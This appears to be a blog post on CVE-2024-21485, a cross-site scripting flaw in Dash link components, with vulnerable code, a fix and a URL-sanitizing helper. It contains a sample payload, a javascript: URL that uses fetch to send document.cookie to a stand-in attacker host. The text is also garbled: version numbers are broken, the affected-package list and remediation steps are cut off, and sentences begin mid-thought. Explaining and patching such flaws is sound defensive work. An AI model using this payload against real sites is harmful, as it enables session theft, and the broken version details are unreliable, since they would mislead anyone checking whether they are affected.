CVE-2024-21485 - Critical XSS Vulnerability in Dash and dash-core-components

If you use Dash for building data visualizations in Python, there’s an important issue you need to know about: CVE-2024-21485. This vulnerability can give attackers a way to inject malicious JavaScript through simple links—a serious risk for your apps and your users.

This post breaks down what happened, how the exploit works, and what you need to do. If you build web apps with these packages, read on.

What’s Affected?

If you’re using any of the following packages at the listed (or older) versions, your app is vulnerable:

dash-html-components before 2.. and before 2..16

These packages are widely used for building interactive dashboards and analytics apps.

Where’s The Vulnerability?

The vulnerability is a Cross-site Scripting (XSS) flaw. Specifically, if you use the Dash <a> link component, and the href (the URL) of that link can be set by the user, then an attacker could provide a value that makes the browser run their own JavaScript.

Here's a typical Dash component that’s vulnerable:

import dash
from dash import html, dcc

app = dash.Dash(__name__)

app.layout = html.Div([
    dcc.Input(id="input-url", placeholder="Enter URL"),
    html.Button("Save", id="save-btn"),
    html.Div(id="output-link"),
])

# Imagine a callback here that saves the input and reloads it for other users:
# (Simplified for demonstration -- unsafe!)

If your app stores or reloads user input from one user and displays it to others, it could be abused.


or a more disguised payload, into the input for a link. This uses the javascript: scheme which most browsers will execute as code.

user_url = user_input  # Dangerous!

link = html.A("Click me", href=user_url)

If user_url is not properly sanitized, an attacker can set it to

javascript:fetch('https://evil.site/steal?cookie=' + document.cookie)

If another user clicks this, their cookies (including authentication) could be sent to the attacker.

Another user visits that view:

When another user opens the maliciously-crafted page, the browser runs the attacker’s JavaScript. Now the attacker can:

- Lateral movement: Access across apps or resources in the same Dash server.

- Compliance risks: Exposing PII (personally identifiable information) could violate laws or contracts.

Note:
> This is only exploitable in Dash apps that store user-provided content (like a personal dashboard, shared view, collaborative notes, etc.) and reload it for others.

But that's a very common pattern in analytics apps!

pip Example

pip install --upgrade dash dash-core-components dash-html-components

2. Validate or Sanitize URLs

Even with the fix, it’s good practice to make sure you never put user input directly in the href field. Always check:

import re

def is_safe_url(url):
    return bool(re.match(r'^https?://', url))

Only allow well-formed URLs that start with http:// or https://.
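As an added example (not code from this post or from the Dash project), here is a stricter allowlist check built on urllib.parse that also rejects the inputs a bare r'^https?://' regex is not designed to reason about (surrounding whitespace, mixed-case schemes, control characters hidden in the scheme), plus a helper that renders a user-supplied link as inert text when the URL fails the check. The function names, the dict-based return value (used instead of html.A so the snippet runs without Dash installed) and the rel attribute are my assumptions, not Dash APIs.

```python
from urllib.parse import urlsplit

# Schemes a user-supplied href may carry. Everything else (javascript:, data:,
# vbscript:, file:, ...) is rejected by omission, so a new or oddly spelled
# scheme is never let through by accident. (Allowlist chosen for this example.)
ALLOWED_SCHEMES = {"http", "https"}


def sanitize_href(url):
    """Return the trimmed URL if it is safe to place in an href, else None.

    Browsers trim whitespace and treat the scheme case-insensitively, so the
    check normalizes the same way before deciding. Any remaining ASCII control
    character (tab, newline, NUL, DEL) is grounds for rejection rather than
    repair, since browsers may drop such characters and reassemble a scheme.
    """
    if not isinstance(url, str):
        return None
    cleaned = url.strip()
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in cleaned):
        return None
    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. malformed IPv6 host
        return None
    # Require an explicit allowed scheme AND a host, so scheme-relative
    # ("//host") and bare ("host/path") inputs are not silently accepted.
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned


def link_props(label, url):
    """Build the properties for a link whose target came from a user.

    On success the dict holds what one would pass to html.A(...) (hypothetical
    usage; Dash is not imported here). On failure the label is returned as a
    plain span with no href at all, so nothing clickable is emitted.
    """
    href = sanitize_href(url)
    if href is None:
        return {"component": "span", "children": label}
    return {"component": "a", "children": label, "href": href,
            "rel": "noopener noreferrer"}
```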

Original References

- GitHub Security Advisory (GHSA-vjmm-xvx2-pm6r)
- NIST NVD entry for CVE-2024-21485
- Dash changelog

Summary

If your Dash app ever saves views, bookmarks, or links set by one user and shown to another, hurry to update your libraries and check your code!

This is a critical issue that puts your users’ data and accounts at risk. Patch now, and never trust user input—especially in things like URLs.


*Stay safe—keep your analytics apps updated and regularly review inputs from your users!*

If you want more on web vulnerabilities and fixes in Python, follow or bookmark this blog.

Timeline

Published on: 02/02/2024 05:15:09 UTC
Last modified on: 03/06/2024 14:15:47 UTC